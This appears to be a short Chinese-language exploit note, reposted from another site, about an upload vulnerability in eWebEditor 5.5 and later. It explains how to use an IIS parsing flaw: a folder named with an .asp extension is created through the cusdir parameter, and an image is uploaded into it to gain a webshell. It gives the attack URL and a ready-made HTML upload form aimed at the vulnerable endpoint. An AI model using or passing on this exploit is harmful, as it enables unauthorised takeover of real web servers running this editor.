影响版本:ewebeditor5.5版,对6.X以上版本也管用,对ASP。aspx。JSP。均管用。

转载地址:http://www.chouwazi.com/article.asp?id=301

ewebeditor5.5版没有mdb数据库,账号和密码存在配置文件

漏洞描述:利用IIS的解析漏洞建立一个XX.asp的文件夹,上传jpg拿webshell

1.   http://www.xxx.net/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=dd.asp

 

 

 

可以建立一个a.asp文件夹

 

或者直接用html上传

<form action="http://www.XXX.com/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=dd.asp" method=

post name=myform enctype="multipart/form-data">

<input type=file name=uploadfile size=100><br><br>

<input type=submit value=upload>

</form>